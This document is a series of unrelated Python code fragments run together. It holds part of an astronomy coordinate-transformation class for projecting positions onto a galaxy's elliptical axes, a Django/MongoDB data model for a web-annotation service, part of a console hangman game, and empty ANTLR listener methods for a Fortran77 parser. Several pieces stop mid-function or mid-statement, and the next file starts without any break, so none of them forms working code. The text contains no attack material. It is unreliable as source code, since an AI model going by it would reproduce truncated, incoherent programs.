0 & 0 & -\cos\phi_0 & \sin\phi_0 & 0 & \varepsilon-1
\end{array}
\right]
{\mathbf b} = \left[
\begin{array}{r}
x_f \\
y_f \\
-x_0 \\
-y_0 \\
0 \\
0
\end{array}
\right]
such that
.. math::
{\mathbf x} = \left[
\begin{array}{r}
x_f \\
y_f \\
x_s \\
y_s \\
x_a \\
y_a
\end{array}
\right]
and:
- :math:`\psi` is the Cartesian rotation of the focal-plane
relative to the sky-plane (+x toward East; +y toward North),
- :math:`\phi_0` is the on-sky position angle of the major axis
of the ellipse, defined as the angle from North through East
        - :math:`\varepsilon=1-b/a` is the ellipticity based on the
          semi-minor to semi-major axis ratio (:math:`b/a`).
- :math:`(x_f,y_f)` is the sky-right, focal-plane position
relative to a reference on-sky position :math:`(x_0,y_0)`
relative to the center of the ellipse (galaxy center),
- :math:`(x_s,y_s)` is the on-sky position of :math:`(x_f,y_f)`
relative to the center of the ellipse, and
- :math:`(x_a,y_a)` is the Cartesian position of
:math:`(x_f,y_f)` in units of the semi-major axis.
This form is used such that :math:`{\mathbf A}` need only be defined
once per class instance.
    The class also allows for inverse calculations, i.e., calculating
    the focal-plane positions provided the semi-major axis coordinates.
    In this case,
.. math::
{\mathbf C} = \left[
\begin{array}{rrrr}
\cos\psi & \sin\psi & -1 & 0 \\
-\sin\psi & \cos\psi & 0 & -1 \\
0 & 0 & \sin\phi_0 & \cos\phi_0 \\
0 & 0 & -\cos\phi_0 & \sin\phi_0
\end{array}
\right]
{\mathbf d} = \left[
\begin{array}{r}
-x_0 \\
-y_0 \\
x_a \\
y_a (1-\varepsilon)
\end{array}
\right]
such that
.. math::
{\mathbf f} = \left[
\begin{array}{r}
x_f \\
y_f \\
x_s \\
y_s
\end{array}
\right]
and :math:`{\mathbf f} = {\mathbf C}^{-1}\ {\mathbf d}`.
Args:
xc (float): Same as :math:`x_0`, defined above
yc (float): Same as :math:`y_0`, defined above
rot (float): Same as :math:`\psi`, defined above
pa (float): Same as :math:`\phi_0`, defined above
ell (float): Same as :math:`\varepsilon`, defined above
Attributes:
xc,yc (float,float): a reference on-sky position relative to the
center of the ellipse (galaxy center); same as
:math:`(x_0,y_0)` defined above
rot (float): Cartesian rotation of the focal-plane relative to
the sky-plane (+x toward East; +y toward North); same as
:math:`\psi` defined above
pa (float): On-sky position angle of the major axis of the
ellipse, defined as the angle from North through East and is
the same as :math:`\phi_0` defined above
        ell (float): Ellipticity defined as :math:`\varepsilon=1-b/a`,
based on the semi-minor to semi-major axis ratio
(:math:`b/a`) of the ellipse.
A (numpy.ndarray): The coordinate transformation matrix
Alu (numpy.ndarray): The **lu** array returned by
`scipy.linalg.lu_factor`_, which is used to calculate the LU
decomposition of :math:`{\mathbf A}`
Apiv (numpy.ndarray): The **piv** array returned by
`scipy.linalg.lu_factor`_, which is used to calculate the LU
decomposition of :math:`{\mathbf A}`
B (numpy.ndarray): The vector :math:`{\mathbf b}`, as defined
above, used to calculate :math:`{\mathbf x} = {\mathbf
A}^{-1}\ {\mathbf b}`
C (numpy.ndarray): The coordinate transformation matrix use for
the inverse operations
Clu (numpy.ndarray): The **lu** array returned by
`scipy.linalg.lu_factor`_, which is used to calculate the LU
decomposition of :math:`{\mathbf C}`
Cpiv (numpy.ndarray): The **piv** array returned by
`scipy.linalg.lu_factor`_, which is used to calculate the LU
decomposition of :math:`{\mathbf C}`
D (numpy.ndarray): The vector :math:`{\mathbf d}`, as defined
above, used to calculate :math:`{\mathbf f} = {\mathbf
C}^{-1}\ {\mathbf d}`
"""
def __init__(self, xc=None, yc=None, rot=None, pa=None, ell=None):
self.xc = 0.0 if xc is None else xc
self.yc = 0.0 if yc is None else yc
self.rot = 0.0 if rot is None else rot
self.pa = 0.0 if pa is None else pa
self.ell = 0.0 if ell is None else ell
self.A = None
self.Alu = None
self.Apiv = None
self._setA()
self.C = None
self.Clu = None
self.Cpiv = None
self.D = None
self._setC()
def _defined(self):
"""
Determine if the object is defined such that its methods can be
used to convert between coordinate systems.
"""
if self.A is None:
return False
if self.Alu is None:
return False
if self.Apiv is None:
return False
if self.C is None:
return False
if self.Clu is None:
return False
if self.Cpiv is None:
return False
return True
def _setA(self):
"""
Set the transformation matrix and calculate its LU
decomposition for forward operations.
"""
cosr = numpy.cos( numpy.radians(self.rot) )
sinr = numpy.sin( numpy.radians(self.rot) )
cosp = numpy.cos( numpy.radians(self.pa) )
sinp = numpy.sin( numpy.radians(self.pa) )
#cosi = numpy.cos( numpy.radians(self.inc) )
self.A = numpy.array([ [ 1.0, 0.0, 0.0, 0.0, 0.0, 0.0 ],
[ 0.0, 1.0, 0.0, 0.0, 0.0, 0.0 ],
[ cosr, sinr, -1.0, 0.0, 0.0, 0.0 ],
[ -sinr, cosr, 0.0, -1.0, 0.0, 0.0 ],
[ 0.0, 0.0, sinp, cosp, -1.0, 0.0 ],
[ 0.0, 0.0, -cosp, sinp, 0.0, self.ell-1. ] ])
self.Alu, self.Apiv = linalg.lu_factor(self.A)
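The reason `Alu`/`Apiv` are stored is the factor-once, solve-many pattern: the LU decomposition of the fixed matrix is computed a single time, then reused for every coordinate vector. A minimal sketch of that pattern on a small toy system:

```python
import numpy as np
from scipy import linalg

# Factor once...
A = np.array([[3.0, 1.0],
              [1.0, 2.0]])
lu, piv = linalg.lu_factor(A)

# ...then solve A x = b cheaply for any right-hand side.
b = np.array([9.0, 8.0])
x = linalg.lu_solve((lu, piv), b)
```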
def _get_B(self, x, y):
"""
Set the on-sky coordinate vector for forward operations.
Args:
x (`numpy.ndarray`_):
On-sky Cartesian coordinate.
y (`numpy.ndarray`_):
On-sky Cartesian coordinate.
Returns:
`numpy.ndarray`_: Array prepared for the matrix solution.
"""
return numpy.vstack((x.ravel(), y.ravel(), numpy.full(x.size, -self.xc, dtype=float),
numpy.full(x.size, -self.yc, dtype=float),
numpy.zeros(x.size, dtype=float),
numpy.zeros(x.size, dtype=float)))
def _setC(self):
"""
Set the transformation matrix and calculate its LU
decomposition for inverse operations.
"""
cosr = numpy.cos( numpy.radians(self.rot) )
sinr = numpy.sin( numpy.radians(self.rot) )
cosp = numpy.cos( numpy.radians(self.pa) )
sinp = numpy.sin( numpy.radians(self.pa) )
self.C = numpy.array([ [ cosr, sinr, -1.0, 0.0 ],
[ -sinr, cosr, 0.0, -1.0 ],
[ 0.0, 0.0, sinp, cosp ],
[ 0.0, 0.0, -cosp, sinp ] ])
self.Clu, self.Cpiv = linalg.lu_factor(self.C)
def _get_D(self, x, y):
"""
Set the semi-major-axis coordinate vector for inverse operations.
Args:
x (`numpy.ndarray`_):
Semi-major axis Cartesian coordinate.
y (`numpy.ndarray`_):
Semi-major axis Cartesian coordinate.
Returns:
`numpy.ndarray`_: Array prepared for the matrix solution.
"""
return numpy.vstack((numpy.full(x.size, -self.xc, dtype=float),
numpy.full(x.size, -self.yc, dtype=float),
x.ravel(), (1-self.ell)*y.ravel()))
# self.D = numpy.array([ -self.xc, -self.yc, x, (1-self.ell)*y ])
def _calculate_polar(self, x, y):
r"""
Calculate the polar coordinates (radius and azimuth) provided
the Cartesian semi-major-axis coordinates :math:`(x_a,y_a)`
using
.. math::
R &= \sqrt{x_a^2 + y_a^2} \\
\theta &= \tan^{-1}\left(\frac{-y_a}{x_a}\right)
Args:
x,y (array-like): The semi-major-axis Cartesian coordinates
:math:`(x_a,y_a)`.
Returns:
numpy.ndarray: The semi-major-axis polar coordinates:
:math:`R, \theta`.
"""
_x = numpy.atleast_1d(x)
_y = numpy.atleast_1d(y)
if _x.size != _y.size:
raise ValueError('X and Y arrays must have the same size')
R = numpy.sqrt( _x*_x + _y*_y)
theta = numpy.degrees( numpy.arctan2(-_y, _x) )
        # arctan2 returns angles in (-pi, pi]; convert to the [0, 360) range
        if hasattr(theta, '__len__'):
            theta[theta < 0] += 360.
        elif theta < 0:
            theta += 360.
        return R, theta
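The sign convention (note the `-y` inside `arctan2`) can be verified on points with known answers; this is a toy check of the formulas, independent of the class:

```python
import numpy as np

x = np.array([1.0, 0.0, -1.0])
y = np.array([0.0, -1.0, 0.0])
R = np.sqrt(x * x + y * y)
theta = np.degrees(np.arctan2(-y, x))
theta[theta < 0] += 360.0  # map (-180, 180] onto [0, 360)
```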
def _calculate_cartesian(self, r, theta):
r"""
Invert the calculation of the semi-major-axis polar coordinates
to calculate the semi-major-axis Cartesian coordinates
:math:`(x_a,y_a)` using
.. math::
x_a &= \pm R / \sqrt{1 + \tan^2\theta}\\
y_a &= -x_a\ \tan\theta
where :math:`x_a` is negative when :math:`\pi/2 \leq \theta <
3\pi/2`.
Args:
r,theta (array-like): The semi-major-axis polar coordinates
:math:`(R,\theta)`.
Returns:
numpy.ndarray: The semi-major-axis Cartesian coordinates:
:math:`x_a, y_a`.
"""
_r = numpy.atleast_1d(r)
_theta = numpy.atleast_1d(theta)
if _r.size != _theta.size:
raise ValueError('R and THETA arrays must have the same size')
tant = numpy.tan(numpy.radians(_theta))
xd = _r/numpy.sqrt(1.0 + numpy.square(tant))
if hasattr(xd, '__len__'):
from django.db import models
from djangotoolbox.fields import ListField, SetField, DictField, EmbeddedModelField
from django_mongodb_engine.contrib import MongoDBManager
# 20161115, <EMAIL>: reduce data model to fields currently in use by B2Note app.
#
# class CssStyleSheet(models.Model):
# type = models.CharField( max_length = 32,
# choices=(("CSS style sheet", "CssStylesheet"),), null=True )
# value = models.TextField( null= True )
#
#
# class RequestHeaderState(models.Model):
# type = models.CharField( max_length = 32,
# choices = (("HTTP request state","HttpRequestState"),) )
# value = models.TextField() # MUST have exactly 1 HTTP request headers in a single, complete string.
# refinedBy = ListField(EmbeddedModelField(), null=True) # MAY be 1 or more State or Selector.
#
#
# class TimeState(models.Model):
# type = models.CharField( max_length = 32,
# choices = (("Time state","TimeState"),) ) # oa:TimeState
# sourceDate = ListField( models.DateTimeField(), null=True ) # If provided then MUST NOT sourceDateStart nor sourceDateEnd.
# sourceDateStart = models.DateTimeField( null=True ) # MUST NOT if sourceDate, if provided then MUST sourceDateEnd.
# sourceDateEnd = models.DateTimeField( null=True ) # If provided then MUST sourceDateStart.
# # MUST be expressed in the xsd:dateTime format, MUST use the UTC timezone expressed as "Z".
# cached = ListField( models.CharField( max_length = 4096 ), null=True ) # oa:cachedSource
# refinedBy = ListField( EmbeddedModelField(), null=True ) # MAY be 1 or more State or Selector.
#
#
# class RangeSelector(models.Model):
# type = models.CharField(max_length=32,
# choices=(("Range selector", "RangeSelector"),)) # oa:DataPositionSelector
# startSelector = EmbeddedModelField() # Must be exactly 1 inclusive starting point
# endSelector = EmbeddedModelField() # Must be exactly 1 exclusive ending point of same class as startSelector
# refinedBy = ListField( EmbeddedModelField(), null=True )
#
#
# class SvgSelector(models.Model):
# type = models.CharField( max_length = 32,
# choices = (("SVG selector","SvgSelector"),) )
# value = models.TextField( null=True ) # MAY be exactly 1 then MUST be well formed SVG XML.
# refinedBy = ListField( EmbeddedModelField(), null=True )
#
#
# class DataPositionSelector(models.Model):
# type = models.CharField( max_length = 32,
# choices = (("Data position selector","DataPositionSelector"),) ) # oa:DataPositionSelector
# start = models.PositiveIntegerField() # oa:start
# end = models.PositiveIntegerField() # oa:end
# refinedBy = ListField( EmbeddedModelField(), null=True )
#
#
# class TextPositionSelector(models.Model):
# type = models.CharField( max_length = 32,
# choices = (("Text position selector","TextPositionSelector"),) ) # oa:TextPositionSelector
# start = models.PositiveIntegerField() # oa:start
# end = models.PositiveIntegerField() # oa:end
# # [0:2147483647] i.e. with upper-limit 16 bytes per character, max file size of 17179869176 bytes ~ 17 Gb
# refinedBy = ListField( EmbeddedModelField(), null=True )
#
#
# class TextQuoteSelector(models.Model):
# type = models.CharField( max_length = 32,
# choices = (("Text quote selector","TextQuoteSelector"),) ) # oa:TextQuoteSelector
# exact = models.TextField() # oa:exact
# prefix = models.CharField( max_length = 2048, null=True ) # oa:prefix
# suffix = models.CharField( max_length = 2048, null=True ) # oa:suffix
# refinedBy = ListField( EmbeddedModelField(), null=True )
#
#
# class XPathSelector(models.Model):
# type = models.CharField(max_length=32,
# choices=(("XPath selector", "XPathSelector"),) )
# value = models.CharField( max_length = 4096 )
# refinedBy = ListField( EmbeddedModelField(), null=True )
#
#
# class CssSelector(models.Model):
# type = models.CharField( max_length = 32,
# choices = (("CSS selector", "CssSelector"),))
# value = models.CharField( max_length = 4096 ) # CSS selection path to the Segment
# refinedBy = ListField( EmbeddedModelField(), null=True )
#
#
# class FragmentSelector(models.Model):
# type = models.CharField( max_length = 32,
# choices = (("Fragment selector","FragmentSelector"),)) # oa:FragmentSelector
# value = models.CharField( max_length = 4096 ) # rdf:value
# conformsTo = models.CharField( max_length = 256, null=True ) # dcterms:conformsTo
# refinedBy = ListField( EmbeddedModelField(), null=True )
#
#
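The commented-out FragmentSelector model above mirrors the W3C Web Annotation selector vocabulary; a hedged sketch (plain Python, no Django) of the JSON such a selector serializes to — the media-fragment value `t=30,60` (seconds 30 to 60 of a video) is invented for illustration:

```python
import json

# Sketch only: field names follow the Web Annotation vocabulary noted in
# the comments above (oa:FragmentSelector, rdf:value, dcterms:conformsTo).
selector = {
    "type": "FragmentSelector",
    "conformsTo": "http://www.w3.org/TR/media-frags/",  # dcterms:conformsTo
    "value": "t=30,60",                                  # rdf:value (hypothetical)
}
print(json.dumps(selector))
```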
# class SpecificResource(models.Model):
# jsonld_id = models.CharField( max_length = 4096, null=True )
# type = models.CharField( max_length = 256, null=True ) # (rdf:type) oa:SpecificResource
# source = EmbeddedModelField("ExternalResource") # (oa:hasSource)
# ASSESSING = "assessing"
# BOOKMARKING = "bookmarking"
# CLASSIFYING = "classifying"
# COMMENTING = "commenting"
# DESCRIBING = "describing"
# EDITING = "editing"
# HIGHLIGHTING = "highlighting"
# IDENTIFYING = "identifying"
# LINKING = "linking"
# MODERATING = "moderating"
# QUESTIONING = "questioning"
# REPLYING = "replying"
# TAGGING = "tagging"
# MOTIVATION_CHOICES = (
# (ASSESSING, "assessing"), # oa:assessing
# (BOOKMARKING, "bookmarking"), # oa:bookmarking
# (CLASSIFYING, "classifying"), # oa:classifying
# (COMMENTING, "commenting"), # oa:commenting
# (DESCRIBING, "describing"), # oa:describing
# (EDITING, "editing"), # oa:editing
# (HIGHLIGHTING, "highlighting"), # oa:highlighting
# (IDENTIFYING, "identifying"), # oa:identifying
# (LINKING, "linking"), # oa:linking
# (MODERATING, "moderating"), # oa:moderating
# (QUESTIONING, "questioning"), # oa:questioning
# (REPLYING, "replying"), # oa:replying
# (TAGGING, "tagging"), # oa:tagging
# )
# purpose = models.CharField( max_length = 256, choices=MOTIVATION_CHOICES, null=True )
# selector = ListField( EmbeddedModelField(), null=True ) # oa:hasSelector
# state = ListField( EmbeddedModelField(), null=True ) # oa:hasState
# styleClass = ListField( models.TextField(), null=True ) # oa:StyleClass
# renderedVia = ListField( EmbeddedModelField(), null=True ) # Examples show as if "Audience" class can be used as a placeholder here.
# scope = ListField( EmbeddedModelField(), null=True ) # oa:hasScope
#
#
# class Audience(models.Model):
# jsonld_id = models.CharField( max_length=4096, null=True )
# type = ListField( models.CharField( max_length = 256 ), null=True ) # SHOULD come from the schema.org class structure.
# props = DictField( null=True ) # prefixed schema.org's Audience classes


class Agent(models.Model):
#jsonld_id = models.CharField( max_length = 4096, null=True )
PERSON = 'Person'
ORGANISATION = 'Organization agent'
SOFTWARE = 'Software agent'
AGENT_CHOICES = (
(PERSON, 'Person'), # foaf:Person
(ORGANISATION, 'Organization'), # foaf:Organization
(SOFTWARE, 'Software'), # prov:SoftwareAgent
)
type = ListField( models.CharField( max_length = 32,
choices=AGENT_CHOICES), null=True )
name = ListField( models.CharField( max_length = 2048 ), null=True ) # foaf:name
nickname = models.CharField( max_length = 2048, null=True ) # foaf:nick
email = ListField( models.CharField(max_length = 2048), null=True ) # foaf:mbox
#email_sha1 = ListField( models.CharField(max_length = 2048), null=True ) # sha1 of "mailto:"+foaf:mbox
    homepage = ListField( models.CharField(max_length = 4096), null=True ) # foaf:homepage


class SemanticTagSpecificResource(models.Model):
type = models.CharField( max_length = 256, null=True ) # (rdf:type) oa:SpecificResource
    source = models.CharField( max_length = 4096 )


class SemanticTagTextualBody(models.Model):
type = models.CharField( max_length = 64 ) # rdf:type; oa:TextualBody
    value = models.TextField() # oa:text


class SemanticTagBodySet(models.Model):
    type = models.CharField( max_length = 32,
        choices = (
            # Django choices are (stored value, human-readable label) pairs
            ("Composite", "Holistic set of resources"),
            ("List", "Ordered list of resources"),
            ("Independents", "Set of independent resources"),
        ))
items = ListField( EmbeddedModelField() ) # oa:item
ASSESSING = "assessing"
BOOKMARKING = "bookmarking"
CLASSIFYING = "classifying"
COMMENTING = "commenting"
DESCRIBING = "describing"
EDITING = "editing"
HIGHLIGHTING = "highlighting"
IDENTIFYING = "identifying"
LINKING = "linking"
MODERATING = "moderating"
QUESTIONING = "questioning"
REPLYING = "replying"
TAGGING = "tagging"
MOTIVATION_CHOICES = (
(ASSESSING, "assessing"), # oa:assessing
(BOOKMARKING, "bookmarking"), # oa:bookmarking
(CLASSIFYING, "classifying"), # oa:classifying
(COMMENTING, "commenting"), # oa:commenting
(DESCRIBING, "describing"), # oa:describing
(EDITING, "editing"), # oa:editing
(HIGHLIGHTING, "highlighting"), # oa:highlighting
(IDENTIFYING, "identifying"), # oa:identifying
(LINKING, "linking"), # oa:linking
(MODERATING, "moderating"), # oa:moderating
(QUESTIONING, "questioning"), # oa:questioning
(REPLYING, "replying"), # oa:replying
(TAGGING, "tagging"), # oa:tagging
)
purpose = models.CharField(max_length=256, choices=MOTIVATION_CHOICES, null=True)
#created = models.DateTimeField( auto_now_add=True, null=True ) # dcterms:created MUST xsd:dateTime SHOULD timezone.
#modified = models.DateTimeField( null=True ) # MUST xsd:dateTime with the UTC timezone expressed as "Z".
# class ResourceSet(models.Model):
# jsonld_id = models.CharField( max_length = 4096, null=True )
# type = models.CharField( max_length = 32,
# choices = (
# ("Holistic set of resources", "Composite"),
# ("Ordered list of resources", "List"),
# ("Set of independent resources", "Independents"),
# ))
# items = ListField( EmbeddedModelField() ) # oa:item
#
#
# class Choice(models.Model):
# jsonld_id = models.CharField( max_length = 4096, null=True )
# type = models.CharField( max_length = 32,
# choices = (("Ordered list to pick one from", "Choice"),) ) # oa:Choice
# items = ListField( EmbeddedModelField() ) # oa:memberList


class TextualBody(models.Model):
jsonld_id = models.CharField( max_length = 4096, null=True ) #"https://b2note.bsc.es/textualbody/" + mongo_uid
type = ListField( models.CharField( max_length = 64 ), null=True ) # rdf:type; oa:TextualBody
value = models.TextField() # oa:text
#language = ListField( models.CharField( max_length = 256 ), null=True ) # dc:language, [rfc5646]
#format = ListField( models.CharField( max_length = 256 ), null=True ) # dc:format, [rfc6838]
#processingLanguage = models.CharField( max_length = 256, null=True ) #
#LTR = "ltr"
#RTL = "rtl"
#AUTO = "auto"
#TEXT_DIRECTION_CHOICES = (
# (LTR, "ltr" ),
# (RTL, "rtl" ),
# (AUTO, "auto"),
#)
#textDirection = models.CharField( max_length = 32, choices=TEXT_DIRECTION_CHOICES, null=True )
ASSESSING = "assessing"
BOOKMARKING = "bookmarking"
CLASSIFYING = "classifying"
COMMENTING = "commenting"
DESCRIBING = "describing"
EDITING = "editing"
HIGHLIGHTING = "highlighting"
IDENTIFYING = "identifying"
LINKING = "linking"
MODERATING = "moderating"
QUESTIONING = "questioning"
REPLYING = "replying"
TAGGING = "tagging"
MOTIVATION_CHOICES = (
(ASSESSING, "assessing"), # oa:assessing
(BOOKMARKING, "bookmarking"), # oa:bookmarking
(CLASSIFYING, "classifying"), # oa:classifying
(COMMENTING, "commenting"), # oa:commenting
(DESCRIBING, "describing"), # oa:describing
(EDITING, "editing"), # oa:editing
(HIGHLIGHTING, "highlighting"), # oa:highlighting
(IDENTIFYING, "identifying"), # oa:identifying
(LINKING, "linking"), # oa:linking
(MODERATING, "moderating"), # oa:moderating
(QUESTIONING, "questioning"), # oa:questioning
(REPLYING, "replying"), # oa:replying
(TAGGING, "tagging"), # oa:tagging
)
purpose = models.CharField( max_length = 256, choices=MOTIVATION_CHOICES, null=True )
#creator = ListField( EmbeddedModelField("Agent"), null=True ) # dcterms:creator
#created = models.DateTimeField( auto_now_add=True, null=True ) # dcterms:created MUST xsd:dateTime SHOULD timezone.
#modified = models.DateTimeField( null=True ) # MUST xsd:dateTime with the UTC timezone expressed as "Z".
#modified = models.DateTimeField( auto_now=True, null=True ) # MUST xsd:dateTime with the UTC timezone expressed as "Z".
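The active `TextualBody` model above keeps only `type`, `value`, and `purpose`, mirroring `oa:TextualBody` from the W3C Web Annotation data model. A hedged sketch (plain Python, no Django) of the JSON-LD such a body appears in — the note text and target IRI are invented:

```python
import json

# Sketch only: property names follow the Web Annotation vocabulary used in
# the model comments above (rdf:type, oa:text, motivation values).
body = {
    "type": "TextualBody",        # rdf:type -> oa:TextualBody
    "value": "a free-text note",  # oa:text
    "purpose": "commenting",      # one of the MOTIVATION_CHOICES values
}
annotation = {
    "@context": "http://www.w3.org/ns/anno.jsonld",
    "type": "Annotation",
    "body": body,
    "target": "https://example.org/record/123",  # hypothetical target IRI
}
print(json.dumps(annotation, indent=2))
```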
class ExternalSpecificResource(models.Model):
jsonld_id = models.CharField( max_length = 4096, null=True ) # file PID
type = models.CharField( max_length = 256, null=True ) # (rdf:type) oa:SpecificResource
    source = models.CharField( max_length = 4096 ) # file URL (required)


class ExternalResource(models.Model):
jsonld_id = models.CharField( max_length = 4096 ) # can be IRI with fragment component
DATASET = "dataset"
IMAGE = "image"
VIDEO = "video"
SOUND = "sound"
TEXT = "text"
RESOURCE_TYPE_CHOICES = (
(DATASET, "Dataset"), # dctypes:Dataset
(IMAGE, "Image"), # dctypes:StillImage
(VIDEO, "Video"), # dctypes:MovingImage
(SOUND, "Audio"), # dctypes:Sound
(TEXT, "Text"), # dctypes:Text
)
type = ListField( models.CharField( max_length = 64, choices=RESOURCE_TYPE_CHOICES), null=True ) #rdf:class
#format = ListField( models.CharField( max_length = 256 ), null=True ) # dc:format, [rfc6838]
#language = ListField( models.CharField( max_length = 256 ), null=True ) # dc:language, [bcp47]
#processingLanguage = models.CharField( max_length = 256, null=True ) #
#LTR = "ltr"
#RTL = "rtl"
#AUTO = "auto"
#TEXT_DIRECTION_CHOICES = (
# (LTR, "ltr"),
# (RTL, "rtl"),
# (AUTO, "auto"),
#)
#textDirection = models.CharField( max_length = 32, choices=TEXT_DIRECTION_CHOICES, null=True )
#accessibility = ListField( models.CharField( max_length = 256 ), null=True ) # enumerated list of schema.org accessibilityFeature property
#creator = ListField( EmbeddedModelField("Agent"), null=True ) # dcterms:creator
#created = models.DateTimeField( auto_now_add=True, null=True ) # dcterms:created MUST xsd:dateTime SHOULD timezone.
#modified = models.DateTimeField( null=True ) # MUST xsd:dateTime with the UTC timezone expressed as "Z".
#modified = models.DateTimeField( auto_now=True, null=True ) # MUST xsd:dateTime with the UTC timezone expressed as "Z".
#rights = ListField( models.CharField( max_length=4096 ), null=True ) # MAY be then MUST be an IRI
#canonical = models.CharField( max_length=4096, null=True ) # IRI
    #via = ListField(
and word[4] != "O" and word[4] != "o" :
print("\nWrong!\n")
numberOfErrors = numberOfErrors + 1
wrongChars = wrongChars + "o" + ", "
    # Each letter from p to z repeated the identical four-position check;
    # one loop over the remaining letters keeps the behaviour the same.
    for letter in "pqrstuvwxyz":
        if guessChar == letter or guessChar == letter.upper():
            if letter in word[1:5].lower():
                for i in range(1, 5):
                    if word[i].lower() == letter:
                        toGuess = toGuess[:i] + letter + toGuess[i+1:]
            else:
                print("\nWrong!\n")
                numberOfErrors = numberOfErrors + 1
                wrongChars = wrongChars + letter + ", "
if numberOfErrors == 0 :
print("\t___________")
print("\t| |")
print("\t|")
print("\t|")
print("\t|")
print("\t|")
print("\t|")
if numberOfErrors == 1 :
print("\t___________")
print("\t| |")
print("\t| O")
print("\t|")
print("\t|")
print("\t|")
print("\t|")
if numberOfErrors == 2 :
print("\t___________")
print("\t| |")
print("\t| O")
print("\t| |")
print("\t|")
print("\t|")
print("\t|")
if numberOfErrors == 3 :
print("\t___________")
print("\t| |")
print("\t| O")
print("\t| /|")
print("\t|")
print("\t|")
print("\t|")
if numberOfErrors == 4 :
print("\t___________")
print("\t| |")
print("\t| O")
print("\t| /|\\")
print("\t|")
print("\t|")
print("\t|")
if numberOfErrors == 5 :
print("\t___________")
print("\t| |")
print("\t| O")
print("\t| /|\\")
print("\t| / ")
print("\t|")
print("\t|")
if numberOfErrors == 6 :
print("\t___________")
print("\t| |")
print("\t| O")
print("\t| /|\\")
print("\t| / \\")
print("\t|")
print("\t|")
print("\nYou lose! GAME OVER\n")
print("The answer was \"" + word + "\"")
loser = True
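The seven drawing blocks above differ only in which body parts appear; a hedged sketch of a data-driven alternative (the spacing is approximated and not guaranteed to match the original pictures exactly):

```python
def gallows(errors):
    # Build the picture from the error count instead of seven print blocks:
    # the head appears at 1 error, the torso and arms at 2-4, the legs at 5-6.
    head = "O" if errors >= 1 else ""
    torso = "" if errors < 2 else ("|" if errors == 2 else ("/|" if errors == 3 else "/|\\"))
    legs = "" if errors < 5 else ("/" if errors == 5 else "/ \\")
    rows = ["\t___________",
            "\t|         |",
            "\t|         " + head,
            "\t|        " + torso,
            "\t|        " + legs,
            "\t|",
            "\t|"]
    return "\n".join(rows)

print(gallows(3))
```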
if not loser :
print("\n\tWord: " + toGuess)
print("\tMisses: " + wrongChars)
if "_" in toGuess and not loser :
guessChar = ""
while not guessChar.isalpha() :
        guessChar
# Enter a parse tree produced by Fortran77Parser#controlFmt.
def enterControlFmt(self, ctx:Fortran77Parser.ControlFmtContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlFmt.
def exitControlFmt(self, ctx:Fortran77Parser.ControlFmtContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlUnit.
def enterControlUnit(self, ctx:Fortran77Parser.ControlUnitContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlUnit.
def exitControlUnit(self, ctx:Fortran77Parser.ControlUnitContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlRec.
def enterControlRec(self, ctx:Fortran77Parser.ControlRecContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlRec.
def exitControlRec(self, ctx:Fortran77Parser.ControlRecContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlEnd.
def enterControlEnd(self, ctx:Fortran77Parser.ControlEndContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlEnd.
def exitControlEnd(self, ctx:Fortran77Parser.ControlEndContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlErr.
def enterControlErr(self, ctx:Fortran77Parser.ControlErrContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlErr.
def exitControlErr(self, ctx:Fortran77Parser.ControlErrContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlIostat.
def enterControlIostat(self, ctx:Fortran77Parser.ControlIostatContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlIostat.
def exitControlIostat(self, ctx:Fortran77Parser.ControlIostatContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlFile.
def enterControlFile(self, ctx:Fortran77Parser.ControlFileContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlFile.
def exitControlFile(self, ctx:Fortran77Parser.ControlFileContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlStatus.
def enterControlStatus(self, ctx:Fortran77Parser.ControlStatusContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlStatus.
def exitControlStatus(self, ctx:Fortran77Parser.ControlStatusContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlAccess.
def enterControlAccess(self, ctx:Fortran77Parser.ControlAccessContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlAccess.
def exitControlAccess(self, ctx:Fortran77Parser.ControlAccessContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlPosition.
def enterControlPosition(self, ctx:Fortran77Parser.ControlPositionContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlPosition.
def exitControlPosition(self, ctx:Fortran77Parser.ControlPositionContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlForm.
def enterControlForm(self, ctx:Fortran77Parser.ControlFormContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlForm.
def exitControlForm(self, ctx:Fortran77Parser.ControlFormContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlRecl.
def enterControlRecl(self, ctx:Fortran77Parser.ControlReclContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlRecl.
def exitControlRecl(self, ctx:Fortran77Parser.ControlReclContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlBlank.
def enterControlBlank(self, ctx:Fortran77Parser.ControlBlankContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlBlank.
def exitControlBlank(self, ctx:Fortran77Parser.ControlBlankContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlExist.
def enterControlExist(self, ctx:Fortran77Parser.ControlExistContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlExist.
def exitControlExist(self, ctx:Fortran77Parser.ControlExistContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlOpened.
def enterControlOpened(self, ctx:Fortran77Parser.ControlOpenedContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlOpened.
def exitControlOpened(self, ctx:Fortran77Parser.ControlOpenedContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlNumber.
def enterControlNumber(self, ctx:Fortran77Parser.ControlNumberContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlNumber.
def exitControlNumber(self, ctx:Fortran77Parser.ControlNumberContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlNamed.
def enterControlNamed(self, ctx:Fortran77Parser.ControlNamedContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlNamed.
